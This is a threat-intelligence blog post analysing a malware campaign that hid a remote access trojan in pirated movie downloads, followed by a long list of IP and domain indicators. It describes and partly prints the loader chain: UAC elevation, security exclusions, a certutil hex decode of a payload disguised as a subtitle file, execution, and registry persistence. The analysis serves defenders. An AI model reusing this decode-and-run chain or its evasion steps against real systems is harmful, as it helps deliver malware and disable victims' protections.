The Shang-Chi Malware Campaign: Is your pirated copy of the summer blockbuster laced with a RAT?

mins read time
The Shang-Chi Malware Campaign: Is your pirated copy of the summer blockbuster laced with a RAT?
Published on
October 12, 2021
Blog Image

A recent campaign is spreading malware embedded in pirated copies of popular summer blockbusters like Shang-Chi and the Legend of the Ten Rings. Threat actors have been shipping malware embedded in pirated movies that are easily available on Torrent networks. In such campaigns, corrupted movie files trick users into running a batch program that downloads a compatible CODEC for the video file.

In some cases, the video file stops during playtime and prompts the user to execute the provided batch program to install the missing CODECS. In other cases, the downloaded file includes a README file instructing the user to run the same batch file. The dropper malware masquerades as a .srt file (a legit file type that holds subtitles of the video file, which in this case is a hexadecimal encoded dropper file written in C++ [-1-] ).

Screenshot of the files downloaded along with the corrupted movie
Screenshot of the files downloaded along with the corrupted movie

In the above screenshot, the subtitle file named ‘75095_VTS.srt’ contains the encoded payload, and the file named ‘Ultra XVid Codec Setup.bat’ contains the loader batch program of the malware.

 

Technical Analysis

The loader batch program file has two parts:

1. UAC elevation: The code segment below is responsible for running the batch program as administrator, bypassing Windows UAC. The exact code is available on stack overflow. [-2-]

Screenshot of the code responsible for running the batch program as administrator
Screenshot of the code responsible for running the batch program as administrator

The code segment given below is part of the same batch program, however, it gets executed with admin privilege after the elevation of privilege. It then executes 2 Powershell commands to exclude file types: ‘.exe’ and ‘.srt’ from security monitoring

Screenshot of the code running the batch program within admin privileges
Screenshot of the code running the batch program within admin privileges

The ‘ping’ command is used as a sleep mechanism.

2. Malware deployment: The final delivery of payload is via the ‘certutil’ application on Windows. Certutil has been abused by adversaries as a ‘living off the land’ tactic for deploying malware stagers and loaders.

The batch program decodes the hexadecimal encoded payload with the .srt extension to another .srt file, which can be executed after decoding. The command used for decoding is:

certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt

Properties of the decoded executable file
Properties of the decoded executable file

Finally, the batch program launches the malware by executing the decoded .exe file using the following command: start 75095_VTS_tmp.srt

The final executable payload can be easily detected by over 60 security vendors.

Screenshot displaying the detection of the payload by 61 security vendors
Screenshot displaying the detection of the payload by 61 security vendors

 

Detailed Analysis

Our analysis has revealed that:  

  • The final payload shows the characteristics of a very generic RAT (Remote Access Trojan).
  • Droppings: Files are dropped to C:\Users\SYM\AppData\Local\Route0\ directory. And among the dropped files are two executable files: route.exe and zroute.exe. 
  • Persistence: The malware modifies the registry of the victim machine to have persistence on the system by adding the value “11f86284” to the following key: 

    Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Thus, the key-value points to route.exe file in the C:\Users\SYM\AppData\Local\Route0\ directory thereby surviving, and the system restarts.

    Screenshot displaying changed value of key
    Screenshot displaying changed value of key

     

    Campaign History

    A quick Google search of the filenames linked to this campaign reveals a plethora of domains hosting the same malicious files with similar names. Since these domains have high page rankings they appear at the top of Google’s search results. This is not a coincidence, but rather a devious strategy for threat actors to dupe unsuspecting users into accessing infected domains and downloading corrupted files.

    Attackers target sites running on common and popular CMSs (Content Management Systems) and then take control of the application to host their infected files. In peer-to-peer networks such as Torrent, it is not uncommon to see pirated movies used as bait to lure users into downloading infected files. 

    Malicious torrent files are hosted on compromised domains that have high SEO and page ranks. Attackers exploit popular and trending movie titles to link to files that aren’t even valid movie files, such as a corrupted video file that, when played, displays an error box and forces the user to run a malicious script, included with the pirated movie to resolve the missing CODEC issue.

    Sources that host malicious files 

Sources hosting malicious files attached with movie files from google search
Sources hosting malicious files attached with movie files from google search

 

Sources hosting malicious files attached with movie files from google search
Sources hosting malicious files attached with movie files from google search

References

[-1-]-https://www.seedr.cc/zip/131251833?st=582eb00e4f3474cc78843f78d711032d370e6045ff20ac01cf9850764c620c0e&e=1630886510

[-2-]-https://stackoverflow.com/questions/7044985/how-can-i-auto-elevate-my-batch-file-so-that-it-requests-from-uac-administrator

 

Indicators of Compromise

 

C2 81.89.133.248

20.50.102.62

 

IP Addresses DNS
  • 51.38.234.101:443 (TCP) 
  • 78.47.158.89:443 (TCP) 
  • 173.254.250.226:443 (TCP) 
  • 46.252.18.74:443 (TCP) 
  • 198.54.115.171:443 (TCP) 
  • 136.243.92.92:443 (TCP) 
  • 162.0.232.138:443 (TCP) 
  • 128.65.195.243:443 (TCP) 
  • 34.102.136.180:443 (TCP) 
  • 91.204.46.43:443 (TCP) 
  • 198.187.31.41:443 (TCP) 
  • 103.13.112.27:443 (TCP) 
  • 66.218.84.137:443 (TCP) 
  • 172.67.204.60:443 (TCP) 
  • 74.6.231.20:443 (TCP) 
  • 69.147.65.252:443 (TCP) 
  • 69.147.65.251:443 (TCP) 
  • 216.113.181.254:443 (TCP) 
  • 162.219.224.22:443 (TCP) 
  • 207.241.224.2:443 (TCP) 
  • 104.17.29.92:443 (TCP) 
  • 74.6.231.14:443 (TCP) 
  • 184.72.170.20:443 (TCP) 
  • 50.18.134.149:443 (TCP) 
  • 172.253.114.132:443 (TCP) 
  • 74.124.200.140:443 (TCP) 
  • 199.60.103.2:443 (TCP) 
  • 151.139.128.11:443 (TCP) 
  • 40.121.155.219:443 (TCP) 
  • 18.216.252.130:443 (TCP) 
  • 208.80.153.224:443 (TCP) 
  • 52.85.79.57:443 (TCP) 
  • 192.124.249.14:443 (TCP) 
  • 54.244.95.93:443 (TCP) 
  • 54.88.188.66:443 (TCP) 
  • 54.225.165.130:443 (TCP) 
  • 18.208.82.203:443 (TCP) 
  • 65.8.49.35:443 (TCP) 
  • 128.119.50.91:443 (TCP) 
  • 162.159.129.87:443 (TCP) 
  • 128.32.10.243:443 (TCP) 
  • 199.60.103.30:443 (TCP) 
  • 13.57.92.51:443 (TCP) 
  • 34.117.59.81:443 (TCP) 
  • 151.101.1.140:443 (TCP) 
  • 198.167.126.39:443 (TCP) 
  • 168.68.64.32:443 (TCP) 
  • 52.207.29.196:443 (TCP) 
  • 52.85.79.54:443 (TCP) 
  • 69.167.157.6:443 (TCP) 
  • 3.140.222.188:443 (TCP) 
  • 13.226.15.82:443 (TCP) 
  • 128.227.68.224:443 (TCP) 
  • 151.101.1.69:443 (TCP) 
  • 164.64.199.14:443 (TCP) 
  • 128.193.164.152:443 (TCP) 
  • 63.34.116.85:443 (TCP) 
  • 174.128.43.81:443 (TCP) 
  • 153.90.170.2:443 (TCP) 
  • 129.93.169.107:443 (TCP) 
  • 52.5.24.1:443 (TCP) 
  • 3.226.11.114:443 (TCP) 
  • 209.140.148.240:443 (TCP) 
  • 35.172.73.102:443 (TCP) 
  • 104.21.51.62:443 (TCP) 
  • 54.164.191.133:443 (TCP) 
  • 52.44.29.217:443 (TCP) 
  • 97.107.138.119:443 (TCP) 
  • 66.228.55.50:443 (TCP) 
  • 104.26.14.32:443 (TCP) 
  • 151.101.2.137:443 (TCP) 
  • 68.66.226.86:443 (TCP) 
  • 192.94.173.55:443 (TCP) 
  • 13.249.137.47:443 (TCP) 
  • 141.211.186.141:443 (TCP) 
  • 128.193.164.171:443 (TCP) 
  • 52.85.79.16:443 (TCP) 
  • 35.190.16.47:443 (TCP) 
  • 75.2.33.159:443 (TCP) 
  • 128.104.1.207:443 (TCP) 
  • 185.34.32.93:443 (TCP) 
  • 104.16.55.16:443 (TCP) 
  • 34.227.238.166:443 (TCP) 
  • 104.16.41.93:443 (TCP) 
  • 192.0.72.24:443 (TCP) 
  • 104.16.19.6:443 (TCP) 
  • 128.227.24.28:443 (TCP) 
  • 104.16.40.93:443 (TCP) 
  • 104.199.114.61:443 (TCP) 
  • 162.159.130.81:443 (TCP) 
  • 50.87.224.250:443 (TCP) 
  • 151.101.2.152:443 (TCP) 
  • 8.192.40.65:443 (TCP) 
  • 35.190.46.56:443 (TCP) 
  • 13.226.15.84:443 (TCP) 
  • 3.225.1.37:443 (TCP) 
  • 151.101.128.194:443 (TCP) 
  • 192.0.78.25:443 (TCP) 
  • 151.101.0.203:443 (TCP) 
  • 192.0.78.13:443 (TCP) 
  • 192.252.144.10:443 (TCP) 
  • 192.0.78.17:443 (TCP) 
  • 162.144.21.109:443 (TCP) 
  • 74.125.129.147:443 (TCP) 
  • 204.79.197.200:443 (TCP) 
  • 172.217.219.103:443 (TCP) 
  • 209.85.234.190:443 (TCP) 
  • 23.198.6.60:443 (TCP) 
  • 172.217.219.105:443 (TCP) 
  • 23.203.113.116:443 (TCP) 
  • 173.194.194.136:443 (TCP) 
  • 23.213.27.61:80 (TCP) 
  • 31.13.65.36:443 (TCP) 
  • 104.17.27.92:443 (TCP) 
  • 3.218.27.124:443 (TCP) 
  • 184.169.246.182:443 (TCP) 
  • 74.6.143.18:443 (TCP) 
  • 52.8.112.55:443 (TCP) 
  • 216.113.179.36:443 (TCP) 
  • 104.19.215.102:443 (TCP) 
  • 173.201.135.48:443 (TCP) 
  • 37.187.131.152:443 (TCP) 
  • 172.67.221.179:443 (TCP) 
  • 5.255.157.132:443 (TCP) 
  • 65.8.48.47:443 (TCP) 
  • 52.86.133.10:443 (TCP) 
  • 172.67.71.55:443 (TCP) 
  • 76.76.21.21:443 (TCP) 
  • 192.0.78.24:443 (TCP) 
  • 192.0.78.12:443 (TCP) 
  • 192.0.78.9:443 (TCP) 
  • 104.21.26.189:443 (TCP) 
  • 52.201.22.185:443 (TCP) 
  • 151.101.1.2:443 (TCP) 
  • 40.65.135.126:443 (TCP) 
  • 104.21.14.5:443 (TCP) 
  • 54.197.224.147:443 (TCP) 
  • 192.0.78.238:443 (TCP) 
  • 216.239.32.21:443 (TCP) 
  • 3.234.104.255:443 (TCP) 
  • 69.195.85.143:443 (TCP) 
  • 54.230.18.40:443 (TCP) 
  • 172.67.218.214:443 (TCP) 
  • 157.150.185.69:443 (TCP) 
  • 172.67.136.85:443 (TCP) 
  • 50.16.49.81:443 (TCP) 
  • 151.101.1.47:443 (TCP) 
  • 209.51.188.148:443 (TCP) 
  • 172.67.199.124:443 (TCP) 
  • 217.36.67.162:443 (TCP) 
  • 45.79.165.60:443 (TCP) 
  • 45.223.18.106:443 (TCP) 
  • 192.124.249.10:443 (TCP) 
  • 128.32.42.199:443 (TCP) 
  • 198.185.159.144:443 (TCP) 
  • 128.208.97.64:443 (TCP) 
  • 65.8.48.72:443 (TCP) 
  • 151.101.2.125:443 (TCP) 
  • 172.67.138.93:443 (TCP) 
  • 13.249.130.59:443 (TCP) 
  • 104.196.67.245:443 (TCP) 
  • 3.208.95.235:443 (TCP) 
  • 198.54.115.163:443 (TCP) 
  • 35.175.60.16:443 (TCP) 
  • 217.6.19.243:443 (TCP) 
  • 151.101.1.52:443 (TCP) 
  • 54.192.120.70:443 (TCP) 
  • 65.8.48.28:443 (TCP) 
  • 3.226.160.222:443 (TCP) 
  • 64.233.185.132:443 (TCP) 
  • 85.159.207.239:443 (TCP) 
  • 202.40.166.225:443 (TCP) 
  • 54.230.18.31:443 (TCP) 
  • 103.209.96.176:443 (TCP) 
  • 81.169.145.150:443 (TCP) 
  • 50.200.43.189:443 (TCP) 
  • 148.251.77.238:443 (TCP) 
  • 88.99.69.19:443 (TCP) 
  • 148.66.137.120:443 (TCP) 
  • 172.67.154.225:443 (TCP) 
  • 78.46.9.47:443 (TCP) 
  • 217.160.0.8:443 (TCP) 
  • 195.201.13.5:443 (TCP) 
  • 87.230.41.84:443 (TCP) 
  • 144.76.151.243:443 (TCP) 
  • 162.55.68.135:443 (TCP) 
  • 157.90.155.121:443 (TCP) 
  • 185.12.50.35:443 (TCP) 
  • 176.9.36.202:443 (TCP) 
  • 192.169.223.13:443 (TCP)
  • www.hoboleaks.space
  • search.yahoo.com
  • 130.165.225.54.in-addr.arpa
  • 130.252.216.18.in-addr.arpa
  • 92.92.243.136.in-addr.arpa
  • 22.224.219.162.in-addr.arpa
  • 109.165.114.104.in-addr.arpa
  • pages.ebay.it
  • 243.2317.10.32.128.in-addr.arpa
  • archive.org
  • tiktokreactions.com
  • 89.158.47.78.in-addr.arpa
  • 69.1.101.151.in-addr.arpa
  • www.jiskha.com
  • meltacardz.com
  • www.yahoo.com
  • 196.249.167.52.in-addr.arpa
  • good-deeds-day.org
  • labs.waterdata.usgs.gov
  • missionhealth.org
  • 188.222.140.3.in-addr.arpa
  • real.rotation.guce.aws.oath.cloud
  • 1611177g27.secure0020.hubspot.net
  • domyown.com
  • xsolidgoldbysarden.store
  • c1140.campuspress.com
  • 41.31.187.198.in-addr.arpa
  • www.nodalninja.com
  • dclsu.bepress.com
  • catalog.extension.oregonstate.edu
  • new-fp-shed.wg1.b.yahoo.com
  • blog.hubspot.com
  • www.ebay.com
  • 1611177.group27.sites.hubspot.net
  • cbsparts.ca
  • us-east-1.lb.campuspress.com
  • 219.155.121.40.in-addr.arpa
  • 20.231.6.74.in-addr.arpa
  • www.canr.msu.edu
  • marketing-prod-lb-1479136046.us-west-1.elb.amazonaws.com
  • 101.234.38.51.in-addr.arpa
  • ag.umass.edu
  • www.verizonmedia.com
  • 171.115.54.198.in-addr.arpa
  • 180.136.102.34.in-addr.arpa
  • 81.43.128.174.in-addr.arpa
  • ds-global3.l7.search.ystg1.b.yahoo.com
  • prda.aadg.msidentity.com
  • betteritemspro.com
  • 30.103.60.199.in-addr.arpa
  • www.lib.berkeley.edu
  • mastergardener.osu.edu
  • pages.ebay.com
  • cdn.ymaws.com
  • 254.121.249.8.in-addr.arpa
  • www.gmpartsdirect.com
  • www.gmpartsdirect.co
  • 116.113.203.23.in-addr.arpa
  • ifs-vip-node-prod1.ifas.ufl.edu
  • 54.79.85.52.in-addr.arpa
  • www.ebay.it
  • tp.6ca7af544-frontier.amazon.it
  • groummwine.com
  • 105.219.217.172.in-addr.arpa
  • digitalcommons.lsu.edu
  • www.youtube.com
  • www-amazon-it.amazon.map.fastly.net
  • 152.164.193.128.in-addr.arpa
  • edis.ifas.ufl.edu
  • 81.59.117.34.in-addr.arpa
  • nginx-prod-243.lib.berkeley.edu
  • theworldnews.net
  • nginx-prod.lib.berkeley.edu
  • 6.157.167.69.in-addr.arpa
  • 243.195.65.128.in-addr.arpa
  • edge.gycpi.b.yahoodns.net
  • 14.249.124.192.in-addr.arpa
  • advertising.yahoo.com
  • 60.6.198.23.in-addr.arpa
  • guce.yahoo.com
  • 252.164.114.104.in-addr.arpa
  • 140.200.124.74.in-addr.arpa
  • 196.29.207.52.in-addr.arpa
  • acsess.onlinelibrary.wiley.com
  • 2.224.241.207.in-addr.arpa
  • wallbox.com
  • www.albanehundevad.com
  • extension.umass.edu
  • www.oath.com
  • v4-edge.gycpi.b.yahoodns.net
  • 224.153.80.208.in-addr.arpa
  • group27.sites.hscoscdn20.net
  • weedlygreen.com
  • blogspot.l.googleusercontent.com
  • onlinelibrary.wiley.com
  • www-pinterest-com.gslb.pinterest.com
  • lib-saapp1.library.oregonstate.edu
  • reddit.map.fastly.net
  • 140.1.101.151.in-addr.arpa
  • 132.114.253.172.in-addr.arpa
  • issuu.com
  • www.princeedwardisland.ca
  • dnr.wisconsin.gov
  • 39.126.167.198.in-addr.arpa
  • nebnewspapers-prod.unl.edu
  • 20.170.72.184.in-addr.arpa
  • 60.204.67.172.in-addr.arpa
  • en.wikipedia.org
  • ir.library.oregonstate.edu
  • 136.194.194.173.in-addr.arpa
  • 251.65.147.69.in-addr.arpa
  • www.wildlife.state.nm.us
  • 1.24.5.52.in-addr.arpa
  • security.stackexchange.com
  • yahoo.uservoice.com
  • 203.82.208.18.in-addr.arpa
  • sxh.yimg.com
  • srk.shib.live
  • www.dekalbasgrowdeltapine.com
  • ds-oob-fo-media-router1.prod.media.g01.yahoodns.net
  • www.sixandflow.com
  • varni-rLoad-1731Z147IHXTT-5d002958b8033a2b.elb.us-east-1.amazonaws.com
  • www.pinterest.com
  • uae-queendatabase.site
  • www.gardeningknowhow.com
  • blogs.cornell.edu
  • extension.psu.edu
  • 53.group3.sites.hubspot.net
  • nimesphoneexpress.com
  • prod-rotation-v2.guce.aws.oath.cloud
  • 114.11.226.3.in-addr.arpa
  • 51.92.57.13.in-addr.arpa
  • 254.55.248.8.in-addr.arpa
  • finance.yahoo.com
  • 254.181.113.216.in-addr.arpa
  • www.good-deeds-day.org
  • 14.199.64.164.in-addr.arpa
  • virginia-db5.us-east-1.lb.campuspress.com
  • 82.15.226.13.in-addr.arpa
  • 66.188.88.54.in-addr.arpa
  • host.io
  • 147.129.125.74.in-addr.arpa
  • krgroups.net
  • scholar.harvard.edu
  • venezia-giorno-per-giorno.blogspot.com
  • helloorganicbd.com
  • 85.116.34.63.in-addr.arpa
  • 57.79.85.52.in-addr.arpa
  • nodalninja.com
  • 2.170.90.153.in-addr.arpa
  • scholarworks.montana.edu
  • 200.197.79.204.in-addr.arpa
  • albanehundevad.com
  • www.reddit.com
  • 87.129.159.162.in-addr.arpa
  • nebnewspapers.unl.edu
  • 43.46.204.91.in-addr.arpa
  • 32.64.68.168.in-addr.arpa
  • 107.169.93.129.in-addr.arpa
  • 11.128.139.151.in-addr.arpa
  • epage.g.ebay.com
  • sports.yahoo.com
  • 92.29.17.104.in-addr.arpa
  • webhosting-webnode-lb-731081414.us-east-2.elb.amazonaws.com
  • plombiermirabel.ca
  • www.golfdom.com
  • 14.231.6.74.in-addr.arpa
  • www.gmpartsonline.net
  • 149.134.18.50.in-addr.arpa
  • 226.250.254.173.in-addr.arpa
  • lb-az.mrp.usda.gov
  • 74.18.252.46.in-addr.arpa
  • 103.219.217.172.in-addr.arpa
  • 190.234.85.209.in-addr.arpa
  • produ-loadb-14qlqnvqs58to-caf651f80372dfb2.elb.us-east-1.amazonaws.com
  • gbksoft.com
  • 137.84.218.66.in-addr.arpa
  • media-router1.prod.media.yahoo.com
  • 252.65.147.69.in-addr.arpa
  • www.wibs-tirol.at
  • www.amazon.it
  • x1.i.lencr.org
  • 243.10.32.128.in-addr.arpa
  • jewishelpaso.org
  • climateactiontool.org
  • dyna.wikimedia.org
  • group3.sites.hscoscdn00.net
  • www.macoy.com
  • dfi09q69oy2jm.cloudfront.net
  • 35.49.8.65.in-addr.arpa
  • mattsmaskmaking.blogspot.com
  • 27.112.13.103.in-addr.arpa
  • cloudflare-resolve-to.c1140.campuspress.com
  • www.domyown.com
  • 93.95.244.54.in-addr.arpa
  • 224.68.227.128.in-addr.arpa
  • www.aphis.usda.gov
  • 138.232.0.162.in-addr.arpa
  • 91.50.119.128.in-addr.arpa
  • 2.103.60.199.in-addr.arpa
  • www.albanehundevad.com
  • 4.4.8.8.in-addr.arpa
  • tiktokreactions.com
  • 13.223.169.192.in-addr.arpa
  • 106.124.125.74.in-addr.arpa
  • 104.124.125.74.in-addr.arpa

 

Contributors to this Article
Author Image
Related Posts
Blog Image
November 4, 2023

Underground Marketplace Unveils New Ransomware Offering QBit with Advanced Encryption & Customization

On 23 October 2023, CloudSEK’s Threat Intelligence Team detected a Ransomware-as-a-Service (RaaS) group, named QBit introducing a newly developed ransomware written in Go, boasting advanced features to optimize its malicious operations.

Blog Image
September 8, 2023

Understanding Knight Ransomware: Advisory, Analysis

Cyclops, now renamed as Knight also known as Cyclops 2.0, debuted in May 2023. The Cyclops group has successfully developed ransomware that can infect all three major platforms: Windows, Linux, macOS, ESXi and Android.

Blog Image
July 28, 2023

Amadey Equipped with AV Disabler drops Redline Stealer

Our researchers have found out The Amadey botnet is now using a new Healer AV disabler to disable Microsoft Defender and infect target systems with Redline stealer.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.